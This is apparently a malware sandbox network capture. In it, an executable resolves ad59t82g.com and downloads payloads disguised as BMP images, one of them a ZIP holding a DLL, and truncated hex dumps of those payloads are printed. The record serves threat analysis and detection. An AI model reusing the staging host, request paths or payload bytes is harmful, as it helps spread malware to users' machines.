                                        Sep 14, 2024 18:31:40.429351091 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.429358959 CEST4974080192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:40.429380894 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.429441929 CEST4974080192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:40.429578066 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.429615021 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.429646969 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.429663897 CEST4974080192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:40.429680109 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.429734945 CEST4974080192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:40.429809093 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.429841042 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.429888964 CEST4974080192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:40.429893970 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.429924965 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.429958105 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.429980040 CEST4974080192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:40.429990053 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.430031061 CEST4974080192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:40.430041075 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.430074930 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.430107117 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.430129051 CEST4974080192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:40.430140018 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.430172920 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.430188894 CEST4974080192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:40.430222988 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.430255890 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.430278063 CEST4974080192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:40.430686951 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.430738926 CEST4974080192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:40.430804968 CEST804974045.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:40.484591007 CEST4974080192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:41.751308918 CEST4974180192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:41.756580114 CEST804974145.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:41.756686926 CEST4974180192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:43.585002899 CEST4974080192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:47.337352991 CEST4974180192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:47.342528105 CEST804974145.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:47.342567921 CEST804974145.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:47.342614889 CEST804974145.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:47.342648029 CEST804974145.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:47.581410885 CEST804974145.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:47.582704067 CEST4974180192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:47.587582111 CEST804974145.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:59.298732042 CEST4974180192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:59.304691076 CEST804974145.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:59.463129997 CEST804974145.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:59.515744925 CEST4974180192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:59.543032885 CEST4974180192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:59.547903061 CEST804974145.201.245.153192.168.2.4
                                        Sep 14, 2024 18:32:15.250242949 CEST4974180192.168.2.445.201.245.153
                                        Sep 14, 2024 18:32:15.255418062 CEST804974145.201.245.153192.168.2.4
                                        Sep 14, 2024 18:32:15.413552999 CEST804974145.201.245.153192.168.2.4
                                        Sep 14, 2024 18:32:15.468930960 CEST4974180192.168.2.445.201.245.153
                                        Sep 14, 2024 18:32:15.515043020 CEST4974180192.168.2.445.201.245.153
                                        Sep 14, 2024 18:32:15.520009995 CEST804974145.201.245.153192.168.2.4
                                        Sep 14, 2024 18:32:33.250274897 CEST4974180192.168.2.445.201.245.153
                                        Sep 14, 2024 18:32:33.255606890 CEST804974145.201.245.153192.168.2.4
                                        Sep 14, 2024 18:32:33.413877964 CEST804974145.201.245.153192.168.2.4
                                        Sep 14, 2024 18:32:33.468950987 CEST4974180192.168.2.445.201.245.153
                                        Sep 14, 2024 18:32:33.480330944 CEST4974180192.168.2.445.201.245.153
                                        Sep 14, 2024 18:32:33.485459089 CEST804974145.201.245.153192.168.2.4
                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 14, 2024 18:31:05.916450024 CEST5832653192.168.2.41.1.1.1
                                        Sep 14, 2024 18:31:06.078049898 CEST53583261.1.1.1192.168.2.4
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Sep 14, 2024 18:31:05.916450024 CEST192.168.2.41.1.1.10x3d6Standard query (0)ad59t82g.comA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Sep 14, 2024 18:31:06.078049898 CEST1.1.1.1192.168.2.40x3d6No error (0)ad59t82g.com172.67.203.195A (IP address)IN (0x0001)false
                                        Sep 14, 2024 18:31:06.078049898 CEST1.1.1.1192.168.2.40x3d6No error (0)ad59t82g.com104.21.22.88A (IP address)IN (0x0001)false
                                        • ad59t82g.com
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449737172.67.203.195807572C:\Users\user\Desktop\N6xnw0iEGs.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 14, 2024 18:31:06.094753027 CEST73OUTGET /1/tant.bmp HTTP/1.1
                                        Host: ad59t82g.com
                                        Cache-Control: no-cache
                                        Sep 14, 2024 18:31:06.970772982 CEST1236INHTTP/1.1 200 OK
                                        Date: Sat, 14 Sep 2024 16:31:06 GMT
                                        Content-Type: image/x-ms-bmp
                                        Content-Length: 137736
                                        Connection: keep-alive
                                        Last-Modified: Sun, 08 Sep 2024 05:18:56 GMT
                                        ETag: "66dd33c0-21a08"
                                        Cache-Control: max-age=14400
                                        CF-Cache-Status: REVALIDATED
                                        Accept-Ranges: bytes
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uU5KXi7tm1OMVhoxUPflhaB3n1P%2BGcFWwq4ZkdEFttPbLRRdRH4iS9oTeVmnWKchUeDgz0kzV7G%2FvmprZIrjCFTA%2BDrbfdYZo%2BTEMhjh1ZMTd0HrQ8E7CIZpwI5nLPs%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c31c3f1a93241e9-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 84 6c 00 00 6c 34 55 89 89 e5 c2 05 93 67 00 00 ed ae ff 19 6e 6c 68 05 6c 6c 00 68 68 6c 00 00 3e 04 c0 1b c4 99 50 e8 69 6c 00 00 ef a8 14 c9 af ed ec 14 6d 6c 00 53 39 3a 57 6a 07 34 6a 65 0a e5 84 24 a0 6c 00 00 5f 81 58 6a 1e 35 6a 6e 37 06 6c 5a 06 5f 66 89 e8 48 ce 00 6c 6c 66 89 e8 48 d4 00 6c 6c 58 6a 5e 0a 89 84 48 b4 00 00 6c 34 6a 2e 0a e5 84 24 b6 6c 00 00 34 06 64 66 e5 e8 24 dc 6c 6c 00 58 e5 c0 24 b0 6c 6c 00 89 00 48 34 89 c0 48 b8 00 6c 6c 89 ac 48 a8 00 00 6c e5 ac 24 d8 6c 00 00 e5 c0 24 ac 6c 6c 00 89 c0 48 e0 00 6c 6c 66 89 e0 48 cc 00 6c 6c 66 89 f0 48 ce 00 6c 6c 66 89 f8 48 d2 00 6c 6c 66 89 e8 48 da 00 6c 6c 66 89 f8 48 dc 00 6c 6c 66 89 f8 48 de 00 6c 6c c6 44 48 50 53 88 38 48 3d 66 ab 28 24 3e 09 09 c6 44 48 2c 70 66 ab 28 24 50 20 03 c6 44 48 3e 61 88 28 48 53 66 ab 28 24 54 20 05 c6 44 48 3a 62 88 20 48 57 c6 28 48 58 61 e4 20 24 59 0a ab 44 24 36 15 41 66 ab 28 24 44 3a 05 88 4c 48 2a 66 c7 28 48 47 74 19 aa 44 24 25 0d 88 54 48 26 c6 44 48 27 41 88 38 48 4c 88 38 48 [TRUNCATED]
                                        Data Ascii: ll4Ugnlhllhhl>PilmlS9:Wj4je$l_Xj5jn7lZ_fHllfHllXj^Hl4j.$l4df$llX$llH4HllHl$l$llHllfHllfHllfHllfHllfHllfHllDHPS8H=f($>DH,pf($P DH>a(HSf($T DH:b HW(HXa $YD$6Af($D:LH*f(HGtD$%TH&DH'A8HL8HMf($Nf(H\VL$2DH3tu($aT$D$<LHDHotDHtHllFHllHlsh%$l$lHl$lti$lloYHllLHLHLHHlHl$l/ch($l+D$NaDHiv($u?stD
                                        Sep 14, 2024 18:31:06.970828056 CEST1236INData Raw: 24 16 01 49 88 30 48 7c 66 ab 28 24 7d 0a 03 66 c7 e8 48 80 00 6c 6c 52 74 e4 f8 24 82 6c 6c 00 c6 e8 48 83 00 6c 6c 41 88 e8 48 84 00 6c 6c 88 84 48 e9 00 00 6c 0a c7 84 48 ea 00 00 6c 2a 75 88 f0 48 88 00 6c 6c c7 84 48 e5 00 00 6c 0f 74 69 03
                                        Data Ascii: $I0H|f($}fHllRt$llHllAHllHlHl*uHllHlti$l$l8HlHlwll-^kll$lljt$l4HlHlD$p<Hl\$X<UUj3D$(|HxDHtDHXPU($|$r<tHDbXf($D$zD$0
                                        Sep 14, 2024 18:31:06.970864058 CEST1236INData Raw: d2 d4 93 7f 00 6c 9b f1 81 ab af 9e 26 6c 5f d2 89 d0 48 28 01 6c 6c 6a 05 e1 24 01 8b ab ad e8 10 e1 d0 24 f0 6c 6c 00 25 93 13 00 00 9b 9d 59 03 a9 07 c0 14 06 69 03 c6 29 e7 f0 f3 c9 35 8b f3 e7 94 8b 44 48 7c f3 a5 06 69 8b fb e1 d8 24 f0 6c
                                        Data Ascii: l&l_H(llj$$ll%Yi)5DH|i$llYHDl$$W$llrl$D\$@llgD$T$TmP+`|H@cll<$lTHp7obt|$\yec9<jZn_$lTmt,-9lHllUf($
                                        Sep 14, 2024 18:31:06.970899105 CEST672INData Raw: 43 57 30 24 10 1e a0 8b 57 74 e9 d2 0f e9 3c ff ff 93 5f c0 5f 32 31 5b 83 a8 78 c3 8b 18 48 18 8b 28 7a 24 8d 68 34 0f b7 60 7c 8b 44 7a 70 8d 04 e4 e7 04 10 6f ae eb db 21 36 90 00 6f 6c 00 00 68 6c 00 00 93 93 00 00 d4 6c 00 00 6c 6c 00 00 2c
                                        Data Ascii: CW0$Wt<__21[xH(z$h4`|Dzpo!6olhllll,llllllllllllllllllbslMLMTh pgr cnoLbeLunLn (#S deBaHlll:~V~V~VeVfVQVV`hV|VPVPVwxVzVw
                                        Sep 14, 2024 18:31:06.970933914 CEST1236INData Raw: c0 42 1e 65 6c 03 0f 00 00 c8 73 00 00 6c 5c 02 00 6c 4c 00 00 6c 82 01 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 2c 6c 00 42 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c 6c 00 00 6c
                                        Data Ascii: Belsl\lLlllllll,lBllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
                                        Sep 14, 2024 18:31:06.970968962 CEST1236INData Raw: fa 93 93 4f 8a 2b 6d 47 3a af 19 f8 be 94 f9 01 10 c9 c9 a5 8d d1 90 fa ff 93 23 8a 47 6d 2b 3a c3 19 94 be 04 fa 6d 10 a5 0a c9 a4 8d d1 90 fa ff 93 23 8a 47 6d 2b 3a c3 19 94 be 0c fa 6d 10 a5 0a c9 a4 8d d1 90 fa ff 93 23 8a 47 6d 2b 3a c3 19
                                        Data Ascii: O+mG:#Gm+:m#Gm+:m#Gm+:m#Gm+:<m|<<$l9S<S5?Tl)M\/uedtCno|Se\/ntro\?
                                        Sep 14, 2024 18:31:06.971004963 CEST1236INData Raw: 45 90 e7 45 08 3f 3b 33 db 3f 06 02 89 e9 a0 fd ff 93 93 15 50 1c 6d 10 68 40 6e 00 00 e7 94 8d 85 bc 91 ff ff 3f 3c e8 65 c0 6c 00 83 a8 60 8d 85 bc 91 ff ff 3c 3b c7 85 bc 91 ff ff 40 6e 00 00 93 79 40 70 6d 7c eb 25 93 d9 cc fd 93 93 8d 85 98
                                        Data Ascii: EE?;3?Pmh@n?<el`<;@ny@pm|%<Lm<Wy$p|u;8!_37cll9pm3E)|@)3<Pj|U9R<=EmlEhlypm|M_uUT|_)SV;p
                                        Sep 14, 2024 18:31:06.971040010 CEST1236INData Raw: 96 6d 7c 53 ff ba e9 c0 74 60 e1 45 f4 3c e7 cf e8 c4 97 ff ff 35 e7 7d cc e1 29 f4 50 04 ac 96 01 7c 3f ff d6 e9 ac 74 0c e1 29 f4 50 e7 a3 e8 89 97 93 ff 59 e7 11 cc 8d 29 98 50 68 b8 fa 01 10 3f 93 d6 85 ac 18 0c 8d 29 98 50 8b a3 84 6a fb 93
                                        Data Ascii: m|St`E<5})P|?t)PY)Ph?)PjYE<hmS`E<'5}E<m|St`E<@5})PH|?t)PY)Ph,?)PYE<h`mS`E<5}
                                        Sep 14, 2024 18:31:06.971075058 CEST1236INData Raw: 01 7c 3f ff d6 e9 ac 74 0c e1 29 f4 50 e7 a3 e8 d5 9a 93 ff 59 e7 11 cc 8d 29 98 50 68 10 fa 01 10 3f 93 d6 85 ac 18 0c 8d 29 98 50 8b a3 84 b6 f6 93 93 59 8b 11 a0 8d 45 98 3c 68 94 fa 6d 10 53 93 ba 85 c0 18 60 8d 45 98 3c 8b cf 84 fb f6 ff 93
                                        Data Ascii: |?t)PY)Ph?)PYE<hmS`E<5}E<m|St`E<5})P|?t)PYY)Ph?)P:YE<hmS`E<w5}E<m|St`E<5})
                                        Sep 14, 2024 18:31:06.971110106 CEST1236INData Raw: 68 92 6c 00 00 e1 e9 bd fe 93 93 53 50 e4 f1 bc fe 93 93 e8 fd f1 6c 00 8b 19 64 8d 85 d0 92 ff ff ef a8 0c 2b aa e6 0e 88 60 5c 46 3a a7 19 f6 33 ac 04 fc 01 6c 6c 66 89 e9 d0 fc ff 93 e1 85 be 90 93 ff 53 3c 84 ca 9d 6c 6c 68 ff 6c 6c 00 8d e9
                                        Data Ascii: hlSPld+`\F:3llfS<llhll<<ll5<PEkl;d3|=P>@M_hm)WiEw (Een)d )Uqf)ta1f<
                                        Sep 14, 2024 18:31:06.971144915 CEST1236INData Raw: ff d9 8c e7 ff 93 84 f7 84 6c 6c 59 e9 04 93 ff ff 55 21 0c 7c 55 e7 85 f0 8b 93 ff 8b f9 bc e7 ff 93 e5 02 3b 29 60 74 26 93 d9 e0 e7 93 93 e8 ce e8 6c 00 59 3b 93 d6 ff d9 80 e7 ff 93 93 d6 ff d9 88 e7 ff 93 93 d6 8a af 85 a3 fe 93 93 53 51 06
                                        Data Ascii: llYU!|U;)`t&lY;SQhSQlyp|?=<@8m9xlm|3))dS3?hlljh?jM`l,Pyp|
                                        Sep 14, 2024 18:31:06.971268892 CEST1236INHTTP/1.1 200 OK
                                        Date: Sat, 14 Sep 2024 16:31:06 GMT
                                        Content-Type: image/x-ms-bmp
                                        Content-Length: 137736
                                        Connection: keep-alive
                                        Last-Modified: Sun, 08 Sep 2024 05:18:56 GMT
                                        ETag: "66dd33c0-21a08"
                                        Cache-Control: max-age=14400
                                        CF-Cache-Status: REVALIDATED
                                        Accept-Ranges: bytes
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uU5KXi7tm1OMVhoxUPflhaB3n1P%2BGcFWwq4ZkdEFttPbLRRdRH4iS9oTeVmnWKchUeDgz0kzV7G%2FvmprZIrjCFTA%2BDrbfdYZo%2BTEMhjh1ZMTd0HrQ8E7CIZpwI5nLPs%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c31c3f1a93241e9-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 84 6c 00 00 6c 34 55 89 89 e5 c2 05 93 67 00 00 ed ae ff 19 6e 6c 68 05 6c 6c 00 68 68 6c 00 00 3e 04 c0 1b c4 99 50 e8 69 6c 00 00 ef a8 14 c9 af ed ec 14 6d 6c 00 53 39 3a 57 6a 07 34 6a 65 0a e5 84 24 a0 6c 00 00 5f 81 58 6a 1e 35 6a 6e 37 06 6c 5a 06 5f 66 89 e8 48 ce 00 6c 6c 66 89 e8 48 d4 00 6c 6c 58 6a 5e 0a 89 84 48 b4 00 00 6c 34 6a 2e 0a e5 84 24 b6 6c 00 00 34 06 64 66 e5 e8 24 dc 6c 6c 00 58 e5 c0 24 b0 6c 6c 00 89 00 48 34 89 c0 48 b8 00 6c 6c 89 ac 48 a8 00 00 6c e5 ac 24 d8 6c 00 00 e5 c0 24 ac 6c 6c 00 89 c0 48 e0 00 6c 6c 66 89 e0 48 cc 00 6c 6c 66 89 f0 48 ce 00 6c 6c 66 89 f8 48 d2 00 6c 6c 66 89 e8 48 da 00 6c 6c 66 89 f8 48 dc 00 6c 6c 66 89 f8 48 de 00 6c 6c c6 44 48 50 53 88 38 48 3d 66 ab 28 24 3e 09 09 c6 44 48 2c 70 66 ab 28 24 50 20 03 c6 44 48 3e 61 88 28 48 53 66 ab 28 24 54 20 05 c6 44 48 3a 62 88 20 48 57 c6 28 48 58 61 e4 20 24 59 0a ab 44 24 36 15 41 66 ab 28 24 44 3a 05 88 4c 48 2a 66 c7 28 48 47 74 19 aa 44 24 25 0d 88 54 48 26 c6 44 48 27 41 88 38 48 4c 88 38 48 [TRUNCATED]
                                        Data Ascii: ll4Ugnlhllhhl>PilmlS9:Wj4je$l_Xj5jn7lZ_fHllfHllXj^Hl4j.$l4df$llX$llH4HllHl$l$llHllfHllfHllfHllfHllfHllfHllDHPS8H=f($>DH,pf($P DH>a(HSf($T DH:b HW(HXa $YD$6Af($D:LH*f(HGtD$%TH&DH'A8HL8HMf($Nf(H\VL$2DH3tu($aT$D$<LHDHotDHtHllFHllHlsh%$l$lHl$lti$lloYHllLHLHLHHlHl$l/ch($l+D$NaDHiv($u?stD


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.449738172.67.203.195807572C:\Users\user\Desktop\N6xnw0iEGs.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 14, 2024 18:31:07.263653040 CEST116OUTHEAD /1/text.bmp HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: ad59t82g.com
                                        Sep 14, 2024 18:31:07.884438038 CEST690INHTTP/1.1 200 OK
                                        Date: Sat, 14 Sep 2024 16:31:07 GMT
                                        Content-Type: image/x-ms-bmp
                                        Content-Length: 6443425
                                        Connection: keep-alive
                                        Last-Modified: Thu, 08 Aug 2024 15:32:21 GMT
                                        ETag: "66b4e505-6251a1"
                                        Cache-Control: max-age=14400
                                        CF-Cache-Status: MISS
                                        Accept-Ranges: bytes
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXt23f8q%2F3W6MbMJqXQpllALIkweO6CON8Xgnw%2B%2Bv18vQyvdDVuaIk51KKzDxynbbLHBmkZV35tCDq3dxYcq8xO%2FdC26Bu7BS1m1%2FghR6EV%2Br8uPYU5%2F0u32LyvePJk%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c31c3f8e8f043d7-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        Sep 14, 2024 18:31:07.887370110 CEST115OUTGET /1/text.bmp HTTP/1.1
                                        Cache-Control: no-cache
                                        Connection: Keep-Alive
                                        Pragma: no-cache
                                        Host: ad59t82g.com
                                        Sep 14, 2024 18:31:08.030612946 CEST1236INHTTP/1.1 200 OK
                                        Date: Sat, 14 Sep 2024 16:31:07 GMT
                                        Content-Type: image/x-ms-bmp
                                        Content-Length: 6443425
                                        Connection: keep-alive
                                        Last-Modified: Thu, 08 Aug 2024 15:32:21 GMT
                                        ETag: "66b4e505-6251a1"
                                        Cache-Control: max-age=14400
                                        CF-Cache-Status: HIT
                                        Age: 0
                                        Accept-Ranges: bytes
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cE0CrtBjdkE7Lx1GVUwOsKz4LZG5svqBTJQ9CUSZ3tE1n8BLAW%2F9UIYH14YNCLQkmPr7dU2MX9xNOibSKDgWkdriiD3Zhlj61JkreOyxtP4sNZFCQ2EUwMLCSK83jEg%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c31c3fa9aab43d7-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 50 4b 03 04 14 00 00 00 00 00 52 09 02 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 11 00 74 65 78 74 2f 55 54 0d 00 07 f1 31 ac 66 f1 31 ac 66 f1 31 ac 66 50 4b 03 04 14 00 09 00 08 00 ae 88 37 58 00 00 00 00 00 00 00 00 78 a9 06 00 11 00 11 00 74 65 78 74 2f 4d 53 56 43 50 31 34 30 2e 64 6c 6c 55 54 0d 00 07 d3 f1 af 65 6a c1 ab 66 32 4d 82 66 87 7a eb 30 49 5c 70 71 cf 9f 0b 7f 37 1a ef fe ec 4e 99 14 e9 79 0c eb 41 b9 e8 f1 0c 4c 80 3a 7f 76 93 46 46 e8 65 7d bc 46 e7 22 b0 cc d0 5f 0c fe e5 9a c6 07 68 49 cf 67 8c de f1 91 0a 4d 5f 96 fa d9 d6 82 da 5d 83 1e 78 91 03 68 d0 5c f3 7f be 92 78 68 7f 9b 82 3d 58 0a 03 a3 ca 52 a9 20 ad ce 0c 1c 17 57 32 4f 23 2d bd 75 0e cf 2d 73 5a f1 a5 25 a2 53 54 c7 df 3d 96 7b f5 d6 b7 e4 a5 b1 33 57 3e 91 c8 b1 9f 68 0b 2f d7 28 a9 80 e2 6e 4c cc 82 c2 26 fe 2b 7e ce 5e 42 59 1b b0 3c 97 03 3a bf 54 e9 ce 6b d0 11 f6 8c a1 96 6a 71 dd 5b a0 e2 f0 6e 1c 54 d9 8d e7 7b 68 d7 cb 0f 8d a0 bc 2f 63 1e dc b5 69 41 6a 0d fd 2b c8 88 9c 7c 92 ea 7c bc 78 5c b1 3a 4c [TRUNCATED]
                                        Data Ascii: PKRYtext/UT1f1f1fPK7Xxtext/MSVCP140.dllUTejf2Mfz0I\pq7NyAL:vFFe}F"_hIgM_]xh\xh=XR W2O#-u-sZ%ST={3W>h/(nL&+~^BY<:Tkjq[nT{h/ciAj+||x\:LSC@rMu`%fJK]^;$)(H$W1;c9;fLFh!=|z<2A <=T(t-jK<z>Uu>a"-,7*\Qk'#PG[H;*}h}ix!sVN8G&_#]J_g]G,f
                                        Sep 14, 2024 18:31:08.030648947 CEST224INData Raw: 52 4a 96 de f4 55 2f 87 04 f5 77 df 64 b2 b2 cf 7f db 8e e0 a3 c6 bc f2 d8 76 d0 2d a3 8a 92 84 92 1d 04 c3 21 d5 41 3d 5c 5c 55 6e db e0 06 fc 85 66 0c f1 90 1a 88 35 63 60 37 93 5b 01 d5 74 bb 3a a9 99 4a 31 1f 93 12 2f 48 56 f1 b2 b3 25 aa cf
                                        Data Ascii: RJU/wdv-!A=\\Unf5c`7[t:J1/HV%6IIBej">($|:Wb.wAx*BMX}bpk055^%wC ua}*:?u!j[0;!BidiF2T2mg
                                        Sep 14, 2024 18:31:08.030724049 CEST1236INData Raw: 43 07 7d d5 52 2e 0e 0d ed 8f 32 d2 4a 1b cd b4 b5 37 d9 4a 24 75 29 d9 ee e6 23 6f 6f e3 44 44 8b ce 07 24 f8 f2 50 1b 4f 54 7a 79 fa 44 c4 46 93 d7 53 35 9d 29 69 02 2a e2 2a 02 89 0c a6 b9 41 5c 0d 00 1a c1 5d 1f f2 74 a7 f0 ca b9 50 34 00 1b
                                        Data Ascii: C}R.2J7J$u)#ooDD$POTzyDFS5)i**A\]tP4R;O_kF@1ja"<VmjeI*lO|sl"JXl8CxqR"eyt`6o8!E#uAS/VhqQ*4JN^;Qv3G7St5
                                        Sep 14, 2024 18:31:08.030808926 CEST1236INData Raw: 84 01 d4 00 4d e8 b3 f0 50 21 48 b5 0a 28 c7 46 8b ae d9 07 32 a8 95 ce 7b 4b e8 06 9d 24 07 6a d5 36 41 82 de d6 ce 75 57 6c 73 11 5d ec 81 67 ca 2e 53 f9 60 04 06 9e bf 7f 9d e3 ea b1 c8 ed 58 22 4c c8 0b 47 6c 83 6d 54 53 e2 b6 25 bc d0 18 2b
                                        Data Ascii: MP!H(F2{K$j6AuWls]g.S`X"LGlmTS%+5yB#\z3$cWCN0Kw3PmlZbM"o5qW-e $q89l*Nd]lFh0}Z^CTa2JoC*X_M
                                        Sep 14, 2024 18:31:08.030843019 CEST448INData Raw: 7c d0 79 f7 c4 a6 e6 0a 67 24 cb 26 85 8b 19 fb f6 27 29 a1 b3 81 56 ce 2a 77 e4 9c c7 bc f0 fc 32 15 9a 63 0f d6 5c a2 59 20 a1 c3 c6 76 dd 2c b9 bd c8 3c a7 ec 3d 0c b4 40 46 db 6e cb 09 a4 da b3 1f 63 d8 37 37 64 19 32 d0 35 24 b1 68 cc 69 ef
                                        Data Ascii: |yg$&')V*w2c\Y v,<=@Fnc77d25$hi%69|w,1a!qo,0Ek+zNz@.:(c+pf6f@0&"Ky>T0GbRcw-"r#u
                                        Sep 14, 2024 18:31:08.030877113 CEST1236INData Raw: 9e 51 25 f6 ae 87 49 72 1d bc 03 43 76 ea 9c a1 2a b8 d8 64 dc e5 a8 e6 8a f3 e3 23 4b 8f e6 5d 51 d5 30 63 b2 54 61 a9 d3 39 ef b0 7c 83 01 e7 98 0d 91 85 43 4e 83 38 3f 41 81 fb cc 16 dd 2e 42 2f b2 69 7b 56 d7 55 6f 1a 79 a6 c1 a9 d9 ac 56 93
                                        Data Ascii: Q%IrCv*d#K]Q0cTa9|CN8?A.B/i{VUoyVreZsFll m2#:brR*w'psP2mOYF||\^D5k6F },mkmtu&PADr~@&x<s%A,@
                                        Sep 14, 2024 18:31:08.030910015 CEST1236INData Raw: cd fe f3 83 66 3f a6 62 b2 21 35 ef bd 2e b1 29 4f 32 64 ea a6 ae bb 91 22 3e e1 f8 8e cf 15 c6 90 86 4d 0e 04 52 7a c1 20 1b f0 90 d7 cc 44 0f d1 eb f5 ff 3e dc 3f 53 e6 62 68 dd 81 d1 2f 90 46 00 ff 6b 30 a7 e4 95 32 cb bd 1f 8a e5 fe ed 82 53
                                        Data Ascii: f?b!5.)O2d">MRz D>?Sbh/Fk02S&?,){MBQ"z3z)]sP*px_*o1N"9DPvt#lmcM]YPNxy'@Alk2$B]!eL}bq0r
                                        Sep 14, 2024 18:31:08.030945063 CEST448INData Raw: a0 bb 31 1b b8 8e 31 60 fc b3 2c 59 19 d4 bb 54 c4 8a 6e a1 b7 7f 83 c5 7e 08 ca 23 fb b5 f4 9b 60 da 68 9d 5f fc 0b 85 7e cc 04 51 d9 74 b6 b9 9e c6 e6 c4 8d e3 79 aa d8 ff 17 fe c1 5f 04 f8 26 b6 2e 89 f0 4d 1c 2c cf 85 a8 9b 8b 5b f0 35 1b 3c
                                        Data Ascii: 11`,YTn~#`h_~Qty_&.M,[5<K(uOEKoV=c?.&*ln'MYi(/l6}IyL+#fm\(|}A(`W$v,}Ta<xXk?Nq6S_
                                        Sep 14, 2024 18:31:08.030975103 CEST892INData Raw: d4 ab 09 60 40 30 2d f4 97 04 c6 fb 9b 75 2d 6d 07 44 ca d2 e8 cd 17 f6 44 16 d2 ee 44 5b c8 2a 4e 47 48 f6 90 dc cb 89 23 ab 2b 12 dd 8e 4d 11 4d 35 e0 6c da 66 98 92 3e 37 1a 65 06 aa b2 29 fd 8d 37 da e0 69 32 34 81 ec 4f 3f 09 1c 0b 0c 89 b6
                                        Data Ascii: `@0-u-mDDD[*NGH#+MM5lf>7e)7i24O?5fJs>Df<qskouNHP3^_F@$/#9CN.tSFip6('44OY}76x{C4,ba,f60D`SR^Kb
